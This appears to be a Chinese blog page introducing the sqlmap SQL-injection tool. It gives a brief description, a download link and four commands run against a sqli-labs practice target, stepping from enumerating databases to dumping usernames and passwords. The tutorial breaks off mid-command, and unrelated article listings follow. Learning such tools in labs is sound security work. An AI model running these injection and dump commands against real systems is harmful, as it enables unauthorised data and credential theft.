简介

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

下载

下载链接:https://sqlmap.org/

使用

注入流程——查询数据库——查询表——查询列——查询数据
sqlmap.py -u "192.168.80.150/sqli-labs/Less-1/?id=1" --dbs
sqlmap.py -u "192.168.80.150/sqli-labs/Less-1/?id=1" -D "security" --tables
sqlmap.py -u "192.168.80.150/sqli-labs/Less-1/?id=1" -D "security" -T 'users' --columns
sqlmap.py -u "192.168.80.150/sqli-labs/Less-1/?id=1" -D "security" -T 'users' -C username,password --dump

服务型数据库(前提知道数据库用户名和密码):DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQLServer, PostgreSQL, etc.
文件型数据库(前提知道数据库绝对路径):DBMS://DATABASE_FILEPATH (SQLite, Microsoft Access, Firebird, etc.)
直连mysql服务类型数据库
┌──(root												


											

sqlmap的详细使用介绍相关推荐
	

    
								
  1. python简单代码画曲线图教程-Python绘制折线图和散点图的详细方法介绍(代码示例)...
		
    本篇文章给大家带来的内容是关于Python绘制折线图和散点图的详细方法介绍(代码示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助. 1.绘制折线图和散点图要用到matplotlib ...
    
		
    2. 
						
  2. python画折线图代码-Python绘制折线图和散点图的详细方法介绍(代码示例)
		
    本篇文章给大家带来的内容是关于Python绘制折线图和散点图的详细方法介绍(代码示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助. 1.绘制折线图和散点图要用到matplotlib ...
    
		
    3. 
						
  3. Window VNC远程控制LINUX:VNC详细配置介绍
		
    Window VNC远程控制LINUX:VNC详细配置介绍 //---------------------------------------vnc linux下的详细配置 1.VNC的启动/停止/重 ...
    
		
    4. 
						
  4. linux 安装mysql 8.0_Linux安装mysql 8.0的详细方法介绍(代码示例)
		
    本篇文章给大家带来的内容是关于Linux安装mysql 8.0的详细方法介绍(代码示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助. 经过一番努力下载mysql文件,我们可以开始M ...
    
		
    5. 
						
  5. python中3 and not 5_python中not、and和or的优先级与详细用法介绍
		
    前言 (小白专用)本次所分享的是Python中的not.and.or的执行时的优先级,以及他们的具体用法.本文比较详细,不喜勿喷. 一.not.and.or的含义以及优先级 对象 返回结果 优先顺序  ...
    
		
    6. 
						
  6. 如何用FFmpeg编写一个简单播放器详细步骤介绍
		
    如何用FFmpeg编写一个简单播放器详细步骤介绍(转载) FFMPEG是一个很好的库,可以用来创建视频应用或者生成特定的工具.FFMPEG几乎为你把所有的繁重工作都做了,比如解码.编码.复用和解复用. ...
    
		
    7. 
						
  7. 用大约 10 万字的内容对 Java 的核心知识点和常见的 1000 多道面试题,做了详细的介绍
		
    每个技术人都有个大厂梦,我觉得这很正常,并不是饭后的谈资而是每个技术人的追求.像阿里.腾讯.美团.字节跳动.京东等等的技术氛围与技术规范度还是要明显优于一些创业型公司/小公司,如果说能够在这样的公司锻 ...
    
		
    8. 
						
  8. SQLMAP插件tamper模块介绍
		
    今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper模块介绍. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强 ...
    
		
    9. 
						
  9. 联发科p60和骁龙710哪个好_骁龙670、联发科P60和麒麟710哪个好 详细对比介绍
		
    2018年中端移动平台竞争可谓激烈,突出表现在今年高通发布了多款中端移动Soc,而华为在今年年中也发布了一款还不错的移动Soc--麒麟710处理器,而联发科还是凭借去年发布的Helio P60一直持续 ...
    
		
    10. 
		


					

最新文章
	

    
						
  1. 【青少年编程】【一级】 奔跑的马
		
    2. 
						
  2. mysql中pi是什么意思,MySql delimiter的作用是什么
		
    3. 
						
  3. 剪切板与正则表达式测试
		
    4. 
						
  4. 【Java】Java_05 标识符与字符集
		
    5. 
						
  5. VC++开发个人事务管理信息系统
		
    6. 
						
  6. 【 Thread】创建线程的2种方法
		
    7. 
						
  7. vue 实现ps图片编辑_帮你解锁一个新技能,opencv完美媲美PS,图片PS,我们代码实现...
		
    8. 
						
  8. JavaScript基础学习(二)—JavaScript基本概念
		
    9. 
						
  9. jenkins 持续集成, 使用sbt多项目同时package
		
    10. 
						
  10. Visual C# 2008+SQL Server 2005 数据库与网络开发-- 9.1  对XML的支持
		
    11. 
						
  11. Mac影音多媒体工具软件推荐
		
    12. 
						
  12. JDK1.7 jdk7安装和环境变量配置(Windows环境)
		
    13. 
						
  13. SQL数据库置疑数据怎么恢复
		
    14. 
						
  14. r型聚类分析怎么做_聚类分析原理及R语言实现过程
		
    15. 
						
  15. 如何像打王者荣耀一样励志学习
		
    16. 
						
  16. [Mybatis]复杂环境下的SQL
		
    17. 
						
  17. 同比、定比和环比分析
		
    18. 
						
  18. docker容器安装配置及创建容器
		
    19. 
						
  19. java中文编程_Java中文编程开发
		
    20. 
						
  20. 咏春拳谱之小念头(套路详解)
		
    21. 
		

	


热门文章
	

    
									
  1. Tomcat(二):手写嵌入式tomcat
			
    2. 
						
  2. ECharts堆叠柱状图动态数据label显示总和和this指向问题
			
    3. 
						
  3. Visio中绘制两个圆的重叠部分
			
    4. 
						
  4. 几种常见的IPC(进程间通信)学习笔记
			
    5. 
						
  5. 京东新通路联手和路雪打造低温产品B2B新渠道
			
    6. 
						
  6. 微信小程序开发教程5:设置全局css样式
			
    7. 
						
  7. php8关闭jit,PHP8新功能JIT 编译器、联合类型和属性
			
    8. 
						
  8. Mac自带的强大的快速搜索功能是怎么帮助我们工作的
			
    9. 
						
  9. windows下QT出现setGeometry: Unable to set geometry
			
    10. 
						
  10. 移动安全-BTS-PHA-Malware categories
			
    11.